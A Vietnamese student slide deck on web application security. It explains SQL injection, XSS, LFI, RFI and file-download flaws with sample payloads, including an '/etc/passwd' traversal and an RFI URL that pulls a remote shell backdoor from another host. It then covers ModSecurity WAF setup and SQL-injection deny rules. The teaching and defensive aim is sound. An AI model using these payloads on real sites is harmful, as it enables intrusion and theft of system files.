SlideShare uma empresa Scribd logo
1 de 51
WEB APPLICATION SECURITY
Author: Nguyễn Trường Phú – Nguyễn Tuấn Anh
Date: 1-5-2015
ABOUT AUTHOR
• Name: Nguyễn Tuấn Anh
Nguyễn Trường Phú
• Class: 23CCAN04
• Unit: An toàn ứng dụng
CONTENT
1. Web application attack and defense
2. Modsecurity (mod_sec)
Web Application
attack and Defense
Web Application Security
Nền tảng Website phổ biến:
• Apache (httpd)
• Nginx
• IIS
• Apache Tomcat
• PHP
• ASPX (ASP.NET)
• JSP + Servlet (JAVA)
• HTML + CSS / HTML5 + CSS3
• Javascript / Jquery
Client – Side
Server - Side
• MySQL
• MariaDB
• MongoDB
• MemSQL
• Access
• SQLserver
• MSSQL
• ……..
+ +
Web services: Databases:Languages:
Web Application Security
1 Website có thể bị tấn công như thế nào?
• Thông qua Authencation (Các hình thức tấn công vào mật khẩu, giao thức mã hoá, hình thức chứng thực,…)
• Thông qua Session, Transport,…. (Các hình thức tấn công qua bảo mật đường truyền bao gồm cả MITM)
• Thông qua Lổ hổng Web Application
• Thông qua Lổ hổng OS (Đặc biệt nhiều đối với Windows và khá ít đối với Linux)
• Thông qua Server Application/Software (Lổ hổng các service/software khác trên server: Mail, browser,adobe,java,…)
• Thông qua Mã độc hoặc Backdoor được thiết lập từ trước
• Thông qua các hình thức tấn công từ chối dịch vụ (DoS, DDoS, DRDoS, Spam, …..)
• Thông qua Crawler hoặc các kẻ hở trong configure và quản lý (lổ hổng phân quyền, lộ tập tin, đường dẫn nhạy cảm,…
• Thông qua Tấn công vật lý
• Thông qua tâm lý con người (Social)
Web Application Security
Lổ hổng Web Application
1. Injection (SQLi, LDAPi, OS command injection,…)
2. Cross Site Scripting (XSS)
3. Broken Authentication and Session Management (Nguy cơ về quản lý phiên/session)
4. Insecure Direct Object References (Các lổ hổng trong tham chiếu)
5. Cross Site Request Forgery (CSRF)
6. Security Misconfiguration (Lổ hổng trong cấu hình, triển khai dịch vụ web,…)
7. Insecure Cryptographic Storage (Lổ hổng trong mã hoá dữ liệu nhạy cảm)
8. Failure to Restrict URL Access (Các lổ hổng quyền hạn truy cập url nhạy cảm)
9. Insufficient Transport Layer Protection (Lổ hổng đường truyền)
10. Unvalidated Redirects and Forwards (Các lổ hổng chuyển hướng)
10 quy chuẩn bảo mật và cũng là 10 phân nhóm lỗ hổng bảo mật ứng dụng web theo OWASP 2010.
Web Application Security
Ví dụ về 1 số hình thức tấn công Web Application phổ biến:
• SQL injection (SQLi)
• Cross Site Scripting (XSS)
• Local File Inclusion (LFI)
• Remote File Inclusion (RFI)
• Local File Discluse/Download (LFD)
• …..
Web Application Security
Định nghĩa:
1. SQL injection
SQL injection (SQLi) là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ
hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông
báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các
câu lệnh SQL bất hợp pháp
Web Application Security
Ví dụ:
1. SQL injection
Truy cập chuyên mục SQL trên ceh.vn thấy URL có dạng: http://ceh.vn /index.php?page=SQl
 Câu truy vấn CSDL có dạng: “SELECT * FROM chuyenmuc WHERE tenchuyenmuc =“ + $page
Trong đó có thể $page=$_GET(‘tenpage’)
Attacker cố tình truy vấn trên URL: http://ceh.vn /index.php?page=SQl or 1=1
 Câu truy vấn CSDL có dạng: SELECT * FROM chuyenmuc WHERE tenchuyenmuc=SQl or 1=1
Ta thấy vì 1=1 luôn đúng nên truy vấn trả lại tất cả những thông tin có trong bảng chuyenmuc
 Thông tin bị khai thác => Lỗi.
Attacker có thể thực hiện truy vấn phức tạp hơn, truy vấn các cột, trường, thông tin quan trọng hơn.
Web Application Security
Định nghĩa:
2. XSS
XSS xuất hiện khi một ứng dụng web cho phép người dùng nhập các dữ liệu vào mà
không thông qua kiểm duyệt nội dung, những dữ liệu này sẽ tương tác trực tiếp với
những người dùng khác cùng sử dụng website. Nguy cơ tạo ra là hacker có thể
chèn các mã kịch bản như HTML, Javascript… (client side) nhằm ăn cắp
SessionCookie, thay đổi giao diện (deface) hoặc chuyển hướng đến trang có mã
độc khác.
Web Application Security
Định nghĩa:
2. XSS
Web Application Security
Ví dụ:
2. XSS
if(!empty($_GET['name']))
{
$name=$_GET['name'];
print $name;
} else {
Code lây $name trực tiếp từ giá trị khung name và in ra thẳng:
Khi attacker không truy vấn bình thường mà inject mã javascript
vào khung name  Truyền
giá trị trực tiếp cho biến name:
<script>alert(“Crazykid”)</script>
Lúc này được javascript được gán cho biến name và in ra
Như một câu lệnh chứ không phải là 1 truy vấn bình thường
 đoạn javascript độc hại của attacker được thực thi
Web Application Security
Định nghĩa:
3. LFI
Lỗ hổng cho phép các attacker có thể truy vấn các tập tin nhạy cảm trên
web server và đọc được
Nội dung các tập tin đó. Ví dụ các tập tin nhạy cảm: /etc/passwd,
/etc/shadow, httpd.conf,……
Web Application Security
Ví dụ:
3. LFI
Truy cập chuyên mục SQL trên ceh.vn thấy URL có dạng: http://ceh.vn /index.php?page=SQl
 Nếu code trang view có dạng:
<?php
$Bien=$_GET[‘page’];
Include $Bien; ?>
Attacker cố tình truy vấn trên URL: http://ceh.vn /index.php?page=../../../etc/passwd
 Lúc này trở thành giống như là ta code như sau:
<?php
$Bien=$_GET[‘page’];
Include ../../../etc/passwd; ?>
 Attacker có thể đọc được nội dung của tập tin passwd trong đường dẫn ../../etc/ trên server
ngay chính tại trang view.
Chú ý ../ là chuyển lên một thư mục trong Linux. Nếu server windows thì dung ..  URL lencode = %5C
Web Application Security
Định nghĩa:
3. RFI
Cho phép attack gọi đến một file trên web server hoặc trên server khác ngay tại web
server này.
Ví dụ:
http://ceh.vn/page?=http://www.vietnamnet.vn
Nếu ceh.vn bị lỗi RFI thì nội dung trang vietnamnet.vn sẽ hiển hị trên ceh.vn
Nếu attacker đặt backdoor trên vietnamnet.vn dạng:
http://www.vietnamnet.vn/shell.php
Tại ceh.vn attacker truy vấn: http://ceh.vn/page?=www.vietnamnet.vn/shell.php
Thì nội dung backdoor shell.php sẽ được include vào source code của ceh.vn  ta cắm
backdoor trưc tiếp trên ceh.vn
Web Application Security
Ví dụ:
3. RFI
Code:
<?php
$test=$_GET['test'];
include $test.'id=1';
?>
Và register_globals = off
http://xx.xx.xx.xx/CEH/RFI/3test.php?test=http://ceh.vn/shell.txt
Input:
Out:
Web Application Security
Định nghĩa:
3. LFD
Giống LFI nhưng thay vì attacker có thể đọc các file nhạy cảm thì ở đây attacker có thể
Download các file nhạy cảm về máy
Web Application Security
Ví dụ:
3. LFD
Đoạn code sau:
<?php
$test=$_GET['test'];
readfile($test);
?>
Hàm readfile() cho phép chúng ta đọc code file được truyền vào .
http://ceh.vn/CEH/3LFD/1lfd.php?test=/etc/passwd
Web Application Security
Phát hiện, kiểm tra các lổ hổng Web Application:
• Ở vị trí attacker tấn công Opensource hoặc ở vị trị quản trị/chuyên gia an ninh kiểm thử Whitehat:
Đọc source code, Debug Source code tìm lổ hổng.
• Tấn công CloseSource, Đa số, kiểm thử Blackbox:
 Sử dụng phương pháp thủ công
Phương pháp Fuzzer vào các input
(Nhập vào chuỗi ký tự ngẫu nhiên hoặc có mục địch nhằm xác định lổ hổng)
Ví dụ: Thêm vào URL, khung Search, Login,… các câu truy vấn, thay đổi method, tiêm vô số ký tự,…
 Sử dụng phương pháp tự động
Sử dụng các công cụ Scan, tìm kiếm lổ hổng
Ví dụ:
OpenSource: W3AF, Paros (Andiparos và Zed attack Proxy), Skipfish, Grabber, Zero Day Scan,…
CloseSource: Acunetix, N-stalker, NeXpose, Retina, AppScan, ParosPro, ….
Web Application Security
Giải pháp Web Application Security:
• An Toàn Source code: Fix lổ hổng trong source code. Đưa ra 1 số hàm lọc, Security phù hợp
• Authencation: Áp dụng các hình thức mã hoá, chứng thực phù hợp (Kể cả mã hoá đường
truyền (SSL, TLS,…))
• Đảm bảo toàn vẹn dữ liệu
• Permission: Phân quyền tập tin source code web, tập tin quan trọng server, quản trị
web,…phù hợp
• Nâng cao kiến thức quản trị viên, tâm lý con người.
• Thủ thuật riêng (Tuỳ kinh nghiệm mỗi quản trị viên): Giả lập patch web home, Giấu Configure
file, tạo bẫy (honeypot), thiết lập php.ini phù hợp, lợi dụng mod rewirte, ……..
• Sử dụng Web Application Firewall
Web Application Security
Tại sao cần Web Application Firewall?
Nếu 1 Server chứa hàng trăm website  Việc Fix code từng website sẽ gây tốn kém tiền bạc, thời gian,
Vô tình bỏ sót lổ hổng hoặc tạo phản ứng ngược nếu đội ngũ Fix Code trình độ yếu, cần một lớp gia cố
Chắn chắn bên ngoài
Web Application Firewall: Nhanh, Tiết kiệm chi phí, công sức, hiệu quả lớn,
nhiều tính năng mở rộng, Quản trị tập trung, …. Và còn nhiều lợi ích khác
Web Application Security
Tại sao dùng Web Application khi có Firewall thông thường?
Bởi vì ta cần những thứ firewall thông thường không có hoặc không được thiết kế với mục đích:
Hoạt động và bảo vệ mạnh mẽ Layer 7, chống các cuộc tấn công layer 7.
Phân tích, lọc, kiểm duyệt, thậm chí sửa đổi mạnh mẽ không chỉ header mà còn cả Request body,
Request Response, được thiết kế để phù hợp với từng ứng dụng web, từng hệ thống web,
Buffer các request/response để đảm bảo phân tích toàn diện vào bảo vệ tốt ứng dụng trong thời gian
Thực
Một số sản phẩm WAF cung cấp nhiều tính năng mở rộng như: Kiểm soát Cookies, Fake port,
Fake Comment, Fake Compoment, …….
Web Application Security
Sơ đồ triển khai hệ thống đề nghị (Chỉ đối với 1 hệ thống Web server)
Web
Server
Database
Server
Reverse
Proxy
-----
WAF
(mod_sec)
User
Chú ý: WAF (Trong bài này là Mod_sec) và các luật chính của firewall tầng dưới sẽ triển khai tại Reverse
Proxy. 1 Reverse Proxy có thể triển khai với nhiều Web Server. Tuỳ nhu cầu và điều kiện + Độ quan trọng
Của DB mà triển khai Database riêng như mô hình hay để DB ngay tại Webserver còn Database triển
Khai như một Server AD Backup hoặc gỡ bỏ để tiết kiệm chi phí.
Web Application Security
Một vài thắc mắc:
Tại sao triển khai WAF trên Reverse Proxy?
 Để bảo toàn Web Server và các Server bên trong khi cuộc tấn công nặng nề. Attacker tiếp xúc trực
Tiếp với reverse proxy.
 Giảm thiểu tài nguyên tiêu tốn cho Web server vì các WAF cần 1 lượng tài nguyên không nhỏ.
 WAF cũng có thể kiểm soát tài nguyên tĩnh được Caching trên Reverse Proxy (HTML, CSS,…)
Một số lời khuyên:
Triển khai Reverse proxy với Nginx hoặc Apache (khuyên dùng Nginx vì độ chịu tải và caching)
Có thể sử dụng Linux cho các server, Nếu sử dụng Linux cho các Server thì khuyên dùng firewall
Application: modsecurity và Firewall tầng dưới dùng Iptables, lý do: Free, Mạnh mẽ, tuỳ biến mạnh,
Modsecurity và Iptables có thể kết hợp với nhau hoàn hảo, Modsecurity có thể ra lệnh cho iptables
Thực hiện các action khi cần thiết thông qua module hỗ trợ.
Web Application Security
ModSecurity
Web Application Security
Modsecurity
Modsecurity (mod_Sec) là gì?
• Một Web Application Firewall (WAF)
• Được triển khai như là một Module của các web service
• Opensource, Có thể mở rộng và miễn phí
chỉ trả tiền nếu muốn có dịch vụ hỗ trợ
Web Application Security
Modsecurity
Hoạt động ra sao?
Kiểm soát chặt chẽ hoạt động của web server trên layer 7. Ghi log. Hành động theo luật
Web
Response
Body
Request
Header
Response
Header
Logging
Request
Body
Web Application Security
Modsecurity
Hoạt động ra sao?
Modsecurity có thể kiểm soát request và reponse trong cả header và body, nếu phát hiện các dấu
Hiệu tấn công theo rules, Mod_sec sẽ thực hiện hoạt động đã được định sẵn theo từng Rules và ghi
Logs lại các hành động đó
Ví dụ: Phát triện trong Url truy vấn có ký tự () thì lập tức DROP.
Ngoài ra Mod_sec còn có thể tạo hoặc chỉnh sửa các Request và Reponse.
Web Application Security
Modsecurity
Triển khai Mod_sec
(thực hiện triển khai trên Server Centos, Web service: apache)
Yêu cầu:
• Apache 2.2x hoặc các phiên bản sau
• Libapr và Libapr-util
• Libpcre
• Liblua v1.5x hoặc các phiên bản sau này
• Module Mod_unique_id của apache phải được bật
Web Application Security
Modsecurity
Triển khai Mod_sec
(thực hiện triển khai trên Server Centos, Web service: apache)
Cài đặt
• Download source Mod_sec tại trang chủ
• Tạm dừng Apache
• Biên dịch và cài đặt Mod_sec
• Load module mod_sec trong file cấu hình apache
Lưu ý: trước khi biên dịch hãy cài trình biên dịch. Đối với Centos: yum groupinstall “Development Tools”
Web Application Security
Modsecurity
Triển khai Mod_sec
(thực hiện triển khai trên Server Centos, Web service: apache)
Tạo tập tin config mod_sec ví dụ modsec.conf và include tập tin này trong file cấu hình apache
Tạo tập tin chứa rules cho Mod_sec ví dụ rulesmod.conf
Trong tập tin modsec.conf ta gõ:
<IfModule mod_security2.c>
SecRuleEngine On
SeDefaultAction
“phase:1,deny,log,status:406,id:60008”
Include “/etc/httpd/conf.d/rulesmod.conf”
</IfModule>
Khởi động Apache.
Sẽ giải thích rõ từng dòng khi Demo.
Web Application Security
Modsecurity
Triển khai Mod_sec
(thực hiện triển khai trên Server Centos, Web service: apache)
Tạo tập tin config mod_sec ví dụ modsec.conf và include tập tin này trong file cấu hình apache
Tạo tập tin chứa rules cho Mod_sec ví dụ rulesmod.conf
Trong tập tin modsec.conf ta gõ:
<IfModule mod_security2.c>
SecRuleEngine On
SeDefaultAction
“phase:1,deny,log,status:406,id:60008”
Include “/etc/httpd/conf.d/rulesmod.conf”
</IfModule>
Khởi động Apache.
Sẽ giải thích rõ chức năng từng dòng khi Demo.
Web Application Security
Modsecurity
Lỗi thường gặp khi cài mod_sec và giải pháp
(thực hiện triển khai trên Server Centos, Web service: apache)
mlogc.c:32:23: error: curl/curl.h: No such file or directory
mlogc.c:2232: error: âCURL_GLOBAL_ALLâ undeclared (first
use in this function)
make[2]: *** [mlogc-mlogc.o] Error 1
make[2]: Leaving directory `/usr/src/modsecurity-
apache_2.6.0/mlogc'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/usr/src/modsecurity-
apache_2.6.0'
make: *** [all] Error 2
Giải pháp: Cài curl và curl-devel sử dụng lệnh: yum install curl*
Sau khi cài xong, xoá Makefile và biên dịch lại.
Web Application Security
Modsecurity
Cấu trúc Rules Mod_sec
(thực hiện triển khai trên Server Centos, Web service: apache)
SecRule VARIABLES OPERATOR [ACTIONS]
VARIABLE: (WHERE?) Vị trí So sánh
OPERATOR : (HOW?) Dấu hiệu căn cứ để so sánh
[ACTIONS]: (WHAT?) Xử lý ra sao
Trong đó:
Web Application Security
Modsecurity
Ví dụ:
(thực hiện triển khai trên Server Centos, Web service: apache)
SecRule ARGS kid
SecRule ARGS|REQUEST_HEADERS:User-Agent kid
SecRule HTTP_Referer “www.google.com”
SecRule ARGS "unions+select" "deny,msg:'SQL Injection'"
SecRule ARGS "unions+alls+select" "deny,msg:'SQL Injection'"
SecRule ARGS "drops+table" "deny,msg:'SQL Injection'"
SecRule ARGS "selects+*" "deny,msg:'SQL "
Sẽ giải thích từng dòng rules khi Demo
Web Application Security
Modsecurity
Các thành phân trong rule mod_sec:
(thực hiện triển khai trên Server Centos, Web service: apache)
VARIABLE: (WHERE?) Vị trí So sánh
Web Application Security
Modsecurity
Các thành phân trong rule mod_sec:
(thực hiện triển khai trên Server Centos, Web service: apache)
OPERATOR : (HOW?) Dấu hiệu căn cứ để so sánh
• So sánh theo chuỗi thường
• So sánh theo toán tử
Ví dụ so sánh toán tử:
SecRule ARGS "!@rx ^CrazyKid$"
Web Application Security
Modsecurity
Các thành phân trong rule mod_sec:
(thực hiện triển khai trên Server Centos, Web service: apache)
ModSecurity hỗ trợ 4 nhóm OPERATOR:
• String–matching operators //so khớp string dùng toán tử
• Numerical operators // So sánh số
• Validation operators // Một vài toán tử đặc biệt so sánh các giá trị đặc biệt
(XML, UTF-8,…)
• Miscellaneous operators // Các toán tử lọc. Dùng so sánh lộ thông tin CC,
lộ thông tin người dùng,….
Web Application Security
Modsecurity
Các thành phân trong rule mod_sec:
(thực hiện triển khai trên Server Centos, Web service: apache)
[ACTIONS]: (WHAT?) Xử lý ra sao
ModSecurity chia các action thành 7 phân mục:
• Disruptive actions
• Flow actions
• Metadata actions
• Variable actions
• Logging actions
• Special actions
• Miscellaneous Actions
Web Application Security
Modsecurity
Các thành phân trong rule mod_sec:
(thực hiện triển khai trên Server Centos, Web service: apache)
Ví dụ Disruptive actions:
- Nếu xử lý khi so khớp thông tin = True thì thực hiện:
+ Allow (cho phép)
+Block (khoá)
+Deny (chặn và gửi phản hồi)
+pass (cho qua luật tiếp theo)
+Drop (Loại bỏ và không phản hồi)
+Pause (Tạm dừng)
…..
Web Application Security
Modsecurity
Câu hỏi đặt ra:
Các quản trị viên không am hiểu Rules mod_sec có thể triển khai mod_sec một cách an toàn không?
Giải pháp trong trường hợp này:
CORE RULE SET (CRS)
Hạn chế: Core rules set là tập hợp rules được viết cho đại đa số người dùng chứ không phải một
Hệ thống cụ thể nào  Tính tuỳ biến, linh hoạt và bảo mật không đảm bảo bằng tự thiết kế rules
Web Application Security
Modsecurity
Một số tính năng mở rộng khác của Modsecurity
Fake port:
Web Application Security
Modsecurity
Một số tính năng mở rộng khác của Modsecurity
Fake robots.txt Disallow Entries
Web Application Security
Modsecurity
Một số tính năng mở rộng khác của Modsecurity
Fake hidden form fields
Web Application Security
Modsecurity
Một số tính năng mở rộng khác của Modsecurity
Làm chậm các công cụ scan lổ hổng tự động
Web Application Security
Modsecurity
Modsecurity Logs
Web Application Security
Modsecurity
Giải pháp Gui logs cho Modsecurity
Một số giải pháp nguồn mở
Cho việc monitor mod_sec
Bằng giao diện đồ hoạ:
Ví dụ: WAF-FLE
Web Application Security
Modsecurity
Và còn rất nhiều tính năng khác……
Web Application Security
Modsecurity
Demo
Q&A
THANK YOU

Mais conteúdo relacionado

Mais procurados

Báo cáo SQL injecttion
Báo cáo SQL injecttionBáo cáo SQL injecttion
Báo cáo SQL injecttionDuy Nguyenduc
 
Room 1 - 2 - Nguyễn Văn Thắng & Dzung Nguyen - Proxmox VE và ZFS over iscsi
Room 1 - 2 - Nguyễn Văn Thắng & Dzung Nguyen - Proxmox VE và ZFS over iscsiRoom 1 - 2 - Nguyễn Văn Thắng & Dzung Nguyen - Proxmox VE và ZFS over iscsi
Room 1 - 2 - Nguyễn Văn Thắng & Dzung Nguyen - Proxmox VE và ZFS over iscsiVietnam Open Infrastructure User Group
 
Tổng quan về an toàn và bảo mật thông tin
Tổng quan về an toàn và bảo mật thông tinTổng quan về an toàn và bảo mật thông tin
Tổng quan về an toàn và bảo mật thông tinNguyen Thi Lan Phuong
 
Trí tuệ nhân tạo "Game cờ Caro"
Trí tuệ nhân tạo "Game cờ Caro"Trí tuệ nhân tạo "Game cờ Caro"
Trí tuệ nhân tạo "Game cờ Caro"Ham Hau
 
Do an xay_dung_website_thuong_mai_dien_tu
Do an xay_dung_website_thuong_mai_dien_tuDo an xay_dung_website_thuong_mai_dien_tu
Do an xay_dung_website_thuong_mai_dien_tuThiênĐàng CôngDân
 
Laravel
LaravelLaravel
LaravelHoc Vu
 
Hệ thống quản lý rạp chiếu phim
Hệ thống quản lý          rạp chiếu phimHệ thống quản lý          rạp chiếu phim
Hệ thống quản lý rạp chiếu phimvennguyennoinho
 
Những nguyên tắc cơ bản xây dựng hệ thống an toàn thông tin trong doanh nghiệp
Những nguyên tắc cơ bản xây dựng hệ thống an toàn thông tin trong doanh nghiệpNhững nguyên tắc cơ bản xây dựng hệ thống an toàn thông tin trong doanh nghiệp
Những nguyên tắc cơ bản xây dựng hệ thống an toàn thông tin trong doanh nghiệpCIO Vietnam
 
Đề thi môn công nghệ phần mềm
Đề thi môn công nghệ phần mềmĐề thi môn công nghệ phần mềm
Đề thi môn công nghệ phần mềmLenhHoXung283
 
Bài giảng bảo mật hệ thống thông tin
Bài giảng bảo mật hệ thống thông tinBài giảng bảo mật hệ thống thông tin
Bài giảng bảo mật hệ thống thông tinTran Tien
 
Báo cáo thực tập Athena - Xây dựng web tin tức bằng WordPress
Báo cáo thực tập Athena - Xây dựng web tin tức bằng WordPressBáo cáo thực tập Athena - Xây dựng web tin tức bằng WordPress
Báo cáo thực tập Athena - Xây dựng web tin tức bằng WordPressTranVanVuong
 
XSS & SQL injection
XSS & SQL injectionXSS & SQL injection
XSS & SQL injectionThieu Mao
 
Graylog manhdv v1.5
Graylog manhdv v1.5Graylog manhdv v1.5
Graylog manhdv v1.5Mạnh Đinh
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhạm Trung Đức
 
Slide đồ án kiểm thử PM
Slide đồ án kiểm thử PMSlide đồ án kiểm thử PM
Slide đồ án kiểm thử PMNguyễn Anh
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - IntroductionKnoldus Inc.
 
Đồ án UML-ASP quản lý phòng khám nha khoa
Đồ án UML-ASP quản lý phòng khám nha khoaĐồ án UML-ASP quản lý phòng khám nha khoa
Đồ án UML-ASP quản lý phòng khám nha khoaTrung Thành Nguyễn
 
Bài giảng Công Nghệ Phần Mềm
Bài giảng Công Nghệ Phần MềmBài giảng Công Nghệ Phần Mềm
Bài giảng Công Nghệ Phần MềmHoài Phạm
 

Mais procurados (20)

Báo cáo SQL injecttion
Báo cáo SQL injecttionBáo cáo SQL injecttion
Báo cáo SQL injecttion
 
Room 1 - 2 - Nguyễn Văn Thắng & Dzung Nguyen - Proxmox VE và ZFS over iscsi
Room 1 - 2 - Nguyễn Văn Thắng & Dzung Nguyen - Proxmox VE và ZFS over iscsiRoom 1 - 2 - Nguyễn Văn Thắng & Dzung Nguyen - Proxmox VE và ZFS over iscsi
Room 1 - 2 - Nguyễn Văn Thắng & Dzung Nguyen - Proxmox VE và ZFS over iscsi
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Tổng quan về an toàn và bảo mật thông tin
Tổng quan về an toàn và bảo mật thông tinTổng quan về an toàn và bảo mật thông tin
Tổng quan về an toàn và bảo mật thông tin
 
Trí tuệ nhân tạo "Game cờ Caro"
Trí tuệ nhân tạo "Game cờ Caro"Trí tuệ nhân tạo "Game cờ Caro"
Trí tuệ nhân tạo "Game cờ Caro"
 
Do an xay_dung_website_thuong_mai_dien_tu
Do an xay_dung_website_thuong_mai_dien_tuDo an xay_dung_website_thuong_mai_dien_tu
Do an xay_dung_website_thuong_mai_dien_tu
 
Laravel
LaravelLaravel
Laravel
 
Hệ thống quản lý rạp chiếu phim
Hệ thống quản lý          rạp chiếu phimHệ thống quản lý          rạp chiếu phim
Hệ thống quản lý rạp chiếu phim
 
Những nguyên tắc cơ bản xây dựng hệ thống an toàn thông tin trong doanh nghiệp
Những nguyên tắc cơ bản xây dựng hệ thống an toàn thông tin trong doanh nghiệpNhững nguyên tắc cơ bản xây dựng hệ thống an toàn thông tin trong doanh nghiệp
Những nguyên tắc cơ bản xây dựng hệ thống an toàn thông tin trong doanh nghiệp
 
Đề thi môn công nghệ phần mềm
Đề thi môn công nghệ phần mềmĐề thi môn công nghệ phần mềm
Đề thi môn công nghệ phần mềm
 
Bài giảng bảo mật hệ thống thông tin
Bài giảng bảo mật hệ thống thông tinBài giảng bảo mật hệ thống thông tin
Bài giảng bảo mật hệ thống thông tin
 
Báo cáo thực tập Athena - Xây dựng web tin tức bằng WordPress
Báo cáo thực tập Athena - Xây dựng web tin tức bằng WordPressBáo cáo thực tập Athena - Xây dựng web tin tức bằng WordPress
Báo cáo thực tập Athena - Xây dựng web tin tức bằng WordPress
 
XSS & SQL injection
XSS & SQL injectionXSS & SQL injection
XSS & SQL injection
 
Đề tài: Quản lí Tour du lịch, HAY, 9đ
Đề tài: Quản lí Tour du lịch, HAY, 9đĐề tài: Quản lí Tour du lịch, HAY, 9đ
Đề tài: Quản lí Tour du lịch, HAY, 9đ
 
Graylog manhdv v1.5
Graylog manhdv v1.5Graylog manhdv v1.5
Graylog manhdv v1.5
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
 
Slide đồ án kiểm thử PM
Slide đồ án kiểm thử PMSlide đồ án kiểm thử PM
Slide đồ án kiểm thử PM
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
 
Đồ án UML-ASP quản lý phòng khám nha khoa
Đồ án UML-ASP quản lý phòng khám nha khoaĐồ án UML-ASP quản lý phòng khám nha khoa
Đồ án UML-ASP quản lý phòng khám nha khoa
 
Bài giảng Công Nghệ Phần Mềm
Bài giảng Công Nghệ Phần MềmBài giảng Công Nghệ Phần Mềm
Bài giảng Công Nghệ Phần Mềm
 

Destaque

SBC 2012 - Windows Security (Lương Trung Thành)
SBC 2012 - Windows Security (Lương Trung Thành)SBC 2012 - Windows Security (Lương Trung Thành)
SBC 2012 - Windows Security (Lương Trung Thành)Security Bootcamp
 
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vnLuan Dt
 
Basic Security Training day 1
Basic Security Training day 1Basic Security Training day 1
Basic Security Training day 1Tu Khiem
 
Network security monitoring (ELK)
Network security monitoring (ELK)Network security monitoring (ELK)
Network security monitoring (ELK)SrbIT
 
Azuravani
AzuravaniAzuravani
Azuravanimot-rez
 
Giao thức bảo mật SSL
Giao thức bảo mật SSLGiao thức bảo mật SSL
Giao thức bảo mật SSLconglongit90
 
AntoanbaomatQQQQQQQQQ
AntoanbaomatQQQQQQQQQAntoanbaomatQQQQQQQQQ
AntoanbaomatQQQQQQQQQViet Tran
 
Hướng dẫn cài đặt và cấu hình cacti trên cent os
Hướng dẫn cài đặt và cấu hình cacti trên cent osHướng dẫn cài đặt và cấu hình cacti trên cent os
Hướng dẫn cài đặt và cấu hình cacti trên cent oslaonap166
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Slide Báo Cáo Cuối Kỳ
Slide Báo Cáo Cuối KỳSlide Báo Cáo Cuối Kỳ
Slide Báo Cáo Cuối KỳLy ND
 
SINGLE SIGN ON (SSO) WITH SECURITY ASSERTION MAKUP LANGUAGE (SAML)
SINGLE SIGN ON (SSO)  WITH SECURITY ASSERTION  MAKUP LANGUAGE (SAML)SINGLE SIGN ON (SSO)  WITH SECURITY ASSERTION  MAKUP LANGUAGE (SAML)
SINGLE SIGN ON (SSO) WITH SECURITY ASSERTION MAKUP LANGUAGE (SAML)Minh Tri Lam
 

Destaque (15)

Brisk WebApp penetration tester
Brisk WebApp penetration testerBrisk WebApp penetration tester
Brisk WebApp penetration tester
 
SBC 2012 - Windows Security (Lương Trung Thành)
SBC 2012 - Windows Security (Lương Trung Thành)SBC 2012 - Windows Security (Lương Trung Thành)
SBC 2012 - Windows Security (Lương Trung Thành)
 
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn
59436013 tan-cong-va-bao-ve-he-thong-tocbatdat-i-train-com-vn
 
Basic Security Training day 1
Basic Security Training day 1Basic Security Training day 1
Basic Security Training day 1
 
Network security monitoring (ELK)
Network security monitoring (ELK)Network security monitoring (ELK)
Network security monitoring (ELK)
 
Azuravani
AzuravaniAzuravani
Azuravani
 
Giao thức bảo mật SSL
Giao thức bảo mật SSLGiao thức bảo mật SSL
Giao thức bảo mật SSL
 
AntoanbaomatQQQQQQQQQ
AntoanbaomatQQQQQQQQQAntoanbaomatQQQQQQQQQ
AntoanbaomatQQQQQQQQQ
 
Hướng dẫn cài đặt và cấu hình cacti trên cent os
Hướng dẫn cài đặt và cấu hình cacti trên cent osHướng dẫn cài đặt và cấu hình cacti trên cent os
Hướng dẫn cài đặt và cấu hình cacti trên cent os
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Slide Báo Cáo Cuối Kỳ
Slide Báo Cáo Cuối KỳSlide Báo Cáo Cuối Kỳ
Slide Báo Cáo Cuối Kỳ
 
Sql injection
Sql injectionSql injection
Sql injection
 
SINGLE SIGN ON (SSO) WITH SECURITY ASSERTION MAKUP LANGUAGE (SAML)
SINGLE SIGN ON (SSO)  WITH SECURITY ASSERTION  MAKUP LANGUAGE (SAML)SINGLE SIGN ON (SSO)  WITH SECURITY ASSERTION  MAKUP LANGUAGE (SAML)
SINGLE SIGN ON (SSO) WITH SECURITY ASSERTION MAKUP LANGUAGE (SAML)
 

Semelhante a Web application-security

Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)
Báo cáo thực tập hàng tuần - Các chuẩn bảo mật web (OWASP)Luc Cao
 
Báo cáo hàng tuần - Các chuẩn bảo mật web (OWASP)
